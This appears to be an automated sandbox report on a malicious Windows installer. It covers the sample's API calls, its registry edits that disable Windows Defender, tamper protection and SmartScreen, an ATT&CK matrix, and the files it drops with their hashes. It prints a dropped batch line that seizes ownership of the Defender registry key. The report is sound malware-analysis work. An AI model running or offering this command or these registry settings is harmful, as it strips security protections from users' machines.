Source: PowerRun64.exe.0.drBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175BD40 cpuid 4_2_00007FF7C175BD40
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,4_2_00007FF7C1756C40
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00007FF7C1757498
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: GetLocaleInfoW,4_2_00007FF7C1757340
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF7C1757674
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: GetLocaleInfoW,4_2_00007FF7C1757548
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: EnumSystemLocalesW,4_2_00007FF7C175791C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: try_get_function,GetLocaleInfoW,4_2_00007FF7C1757EB0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00007FF7C17570F4
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: EnumSystemLocalesW,4_2_00007FF7C175705C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: EnumSystemLocalesW,4_2_00007FF7C1756F8C
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C171D304 GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C171D304
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C171D304 GetSystemTimeAsFileTime,GetCurrentThreadId,GetUserNameExW,GetLastError,GetUserNameExW,GetLastError,LeaveCriticalSection,LeaveCriticalSection,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C171D304
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_0040350F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040350F

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry
Source: C:\Windows\SysWOW64\reg.exeRegistry value created: SpyNetReportingLocation 0Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\ExclusionsRegistry value created: DisableAutoExclusions 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpuserRegistry value created: MpEnablePus 0
Disables Windows Defender Tamper protection
Source: C:\Windows\SysWOW64\reg.exeRegistry value created: TamperProtectionSource 2Jump to behavior
Disables the Smart Screen filter
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer SmartScreenEnabled OffJump to behavior
Disables the phising filter of Microsoft Edge
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter PreventOverrideJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts2
Windows Management Instrumentation		1
Scripting		1
DLL Side-Loading		6
Disable or Modify Tools		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API		1
DLL Side-Loading		1
Bypass User Account Control		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol2
Browser Session Hijacking		Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts12
Command and Scripting Interpreter		Logon Script (Windows)1
Access Token Manipulation		1
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares1
Clipboard Data		SteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook12
Process Injection		1
Timestomp		NTDS54
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets131
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Bypass User Account Control		Cached Domain Credentials2
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Modify Registry		DCSync1
Process Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Virtualization/Sandbox Evasion		Proc Filesystem1
System Owner/User Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Access Token Manipulation		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
Process Injection		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1472092 Sample: Ms63nDrOBa.exe Startdate: 12/07/2024 Architecture: WINDOWS Score: 96 36 Multi AV Scanner detection for dropped file 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Machine Learning detection for sample 2->40 42 2 other signatures 2->42 7 Ms63nDrOBa.exe 1 26 2->7         started        process3 file4 28 C:\Users\user\...\win_version_csharp.exe, PE32 7->28 dropped 30 C:\Users\user\AppData\Local\...\uxdabweej.exe, PE32 7->30 dropped 32 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 7->32 dropped 34 3 other malicious files 7->34 dropped 10 cmd.exe 1 7->10         started        13 cmd.exe 1 7->13         started        process5 signatures6 44 Uses cmd line tools excessively to alter registry or file data 10->44 15 reg.exe 10->15         started        18 reg.exe 1 1 10->18         started        20 reg.exe 1 1 10->20         started        26 35 other processes 10->26 22 conhost.exe 13->22         started        24 SetACL64.exe 1 13->24         started        process7 signatures8 46 Adds extensions / path to Windows Defender exclusion list (Registry) 15->46 48 Disable Windows Defender real time protection (registry) 15->48 50 Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry 18->50 52 Disables Windows Defender Tamper protection 20->52 54 Disables the phising filter of Microsoft Edge 26->54 56 Disables the Smart Screen filter 26->56

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Ms63nDrOBa.exe29%ReversingLabsWin32.Trojan.Generic
Ms63nDrOBa.exe34%VirustotalBrowse
Ms63nDrOBa.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe21%ReversingLabs
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe19%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll0%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe5%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\win_version_csharp.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\win_version_csharp.exe1%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
https://helgeklein.com.0%Avira URL Cloudsafe
https://helgeklein.com0%Avira URL Cloudsafe
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe0%Avira URL Cloudsafe
https://helgeklein.com.0%VirustotalBrowse
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe0%VirustotalBrowse
https://helgeklein.com0%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nsis.sf.net/NSIS_ErrorErrorMs63nDrOBa.exefalse
  • URL Reputation: safe
unknown
https://helgeklein.com.SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://helgeklein.comSetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exeSetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1472092
Start date and time:2024-07-12 09:52:20 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 28s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:44
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:Ms63nDrOBa.exe
renamed because original name is a hash value
Original Sample Name:ad3a57927668a9560b5f01d7ff54c881.exe
Detection:MAL
Classification:mal96.phis.evad.winEXE@149/9@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 98%
  • Number of executed functions: 75
  • Number of non-executed functions: 145
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated

Warnings

  • Exclude process from analysis (whitelisted): dllhost.exe
  • Excluded IPs from analysis (whitelisted): 40.127.169.103, 13.85.23.206, 2.16.100.168, 88.221.110.91
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exefile.exeGet hashmaliciousUnknownBrowse
    Ptmhbplhxb.exeGet hashmaliciousUnknownBrowse
      P196hUN2fw.exeGet hashmaliciousUnknownBrowse
        C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dllSecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
          SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exeGet hashmaliciousUnknownBrowse
            rSCAN31804.exeGet hashmaliciousGuLoader, RemcosBrowse
              rSCAN31804.exeGet hashmaliciousGuLoaderBrowse
                SCAN00381638.SCR.exeGet hashmaliciousGuLoader, RemcosBrowse
                  SCAN00381638.SCR.exeGet hashmaliciousGuLoaderBrowse
                    setup#U67e5#U770b.exeGet hashmaliciousUnknownBrowse
                      BxBT7a2sCE.exeGet hashmaliciousGuLoaderBrowse
                        f1vPbtLjJn.exeGet hashmaliciousGuLoaderBrowse
                          PO 345504521#.exeGet hashmaliciousGuLoaderBrowse
                            C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exePtmhbplhxb.exeGet hashmaliciousUnknownBrowse
                              P196hUN2fw.exeGet hashmaliciousUnknownBrowse
                                e4.exeGet hashmaliciousRedLineBrowse
                                  2dOeahdsto.exeGet hashmaliciousXmrigBrowse
                                    bQQHP9ciRL.exeGet hashmaliciousXmrigBrowse
                                      DllHost.exeGet hashmaliciousXmrigBrowse
                                        Fza7TPh6Z7.exeGet hashmaliciousUnknownBrowse
                                          SAlxtNmHFR.exeGet hashmaliciousRedLine XmrigBrowse
                                            BFSdrqaAvS.exeGet hashmaliciousAmadey RedLineBrowse
                                              We7WnoqeXe.exeGet hashmaliciousAmadey RedLineBrowse

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\nse5B61.tmp\Aygldmdino.ico

                                                Download File
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                Category:dropped
                                                Size (bytes):15086
                                                Entropy (8bit):5.150938541565102
                                                Encrypted:false
                                                SSDEEP:192:Vv17chSvlS4dPrKujOlq5FnyPPc6gO7Dm:Vv1RzrKT0Gha
                                                MD5:49B98E639F4227764354822911E202AF
                                                SHA1:B331473E67138A81FB4B445AF28217E2F814D167
                                                SHA-256:036EA9ACF3E8F9E58A83A1D2BCB1F0C756EF3C2A8671EC1CB527A6ED2CC91DD9
                                                SHA-512:5EAEB99EFD005F103FAD5550EB0B5731D7B2A49463C82F81B81BC282E6B905008E037F11671E57ECEC1A6791E9EB0D65A7EFA92994B6285ED4E4E8C79FE3D761
                                                Malicious:false
                                                Preview:............ .h...6... .... .........00.... ..%..F...(....... ..... .......................................................H@.........................sb.........//0F112.556.;;<.CCD.JKK.[]R............................>7......122z788.=>>.BDD.GII.KMM.OPP.....................................011z566.:;;.@AA.DEE.HII.IKK.llG.................................-..z233.788.<==.@AA.CDD.DEE.DEE.TMR.zaa.y_U.oXN.dPN.gLK..lvP....+,,z/00.344.788.=>>.?@@.>??.?@@.FGG.;<<.788.344./00.$$$.........())z,--./00.344.JJJ.EFF.8::.@@@.JJJ.TUU.233./00.+,,.!!".........%&&z()).+,,.-//.GHH.RSS.?@@.>??.bbb.899..//.+,,.())............."##z%&&.'((.)**.IJJ.QRR.hhh.QQQ.eee.mmm.,--.'((.$%%.............!!!z"##.#$$.%&&.LLL.eff.....BCC.,--./00.'((.#$$."##............. !!z!""."##."##.'((.344.-...$%%.#$$.#$$."##."##.!"".............!""z!""."##."##.!""."##."##."##."##."##."##."##.!"".............!!"z!"".!"".!""."##."##.!""."""."##.!"".!"".!"".!"".............!""z!""."##.!"".""".!"".!"".!"".!"".!"".""".!""."##.............***B)*

                                                C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):945944
                                                Entropy (8bit):6.654096172451499
                                                Encrypted:false
                                                SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                                MD5:EFE5769E37BA37CF4607CB9918639932
                                                SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                                                SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                                SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 21%
                                                • Antivirus: Virustotal, Detection: 19%, Browse
                                                Joe Sandbox View:
                                                • Filename: Ptmhbplhxb.exe, Detection: malicious, Browse
                                                • Filename: P196hUN2fw.exe, Detection: malicious, Browse
                                                • Filename: e4.exe, Detection: malicious, Browse
                                                • Filename: 2dOeahdsto.exe, Detection: malicious, Browse
                                                • Filename: bQQHP9ciRL.exe, Detection: malicious, Browse
                                                • Filename: DllHost.exe, Detection: malicious, Browse
                                                • Filename: Fza7TPh6Z7.exe, Detection: malicious, Browse
                                                • Filename: SAlxtNmHFR.exe, Detection: malicious, Browse
                                                • Filename: BFSdrqaAvS.exe, Detection: malicious, Browse
                                                • Filename: We7WnoqeXe.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):616312
                                                Entropy (8bit):6.302197712270286
                                                Encrypted:false
                                                SSDEEP:12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
                                                MD5:1FB64FF73938F4A04E97E5E7BF3D618C
                                                SHA1:AA0F7DB484D0C580533DEC0E9964A59588C3632B
                                                SHA-256:4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
                                                SHA-512:DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: Ptmhbplhxb.exe, Detection: malicious, Browse
                                                • Filename: P196hUN2fw.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat

                                                Download File
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):158
                                                Entropy (8bit):4.80690240808071
                                                Encrypted:false
                                                SSDEEP:3:tMwDDbRx8iF/Q+VVyXCQyKbup/qNyfrZfyM1KJA7XFhtAG5cF2IJVkBf3GId:pnIm/HVsXZlm/ZH18A7XFhtF5c0IJOBv
                                                MD5:CD22CAEA1D452F4AE5E9DCD3F41741CD
                                                SHA1:A316865317B46ECED16BD67B4FFAF7B9740CFAAE
                                                SHA-256:9AB6A3D57D266265EBA1E12C0A12F9ACF2EE0317EFF89D608486E6E46A229D7F
                                                SHA-512:522AD25F2FDE1F66EDC9944B3029A87A09C1F3F2AA9C4510A01015394542136A6DB9E3C69632C24F15893359483638BC2E6329343E7865E71606C1FDD9D394EC
                                                Malicious:false
                                                Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"..

                                                C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat

                                                Download File
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):12658
                                                Entropy (8bit):5.1902260402180405
                                                Encrypted:false
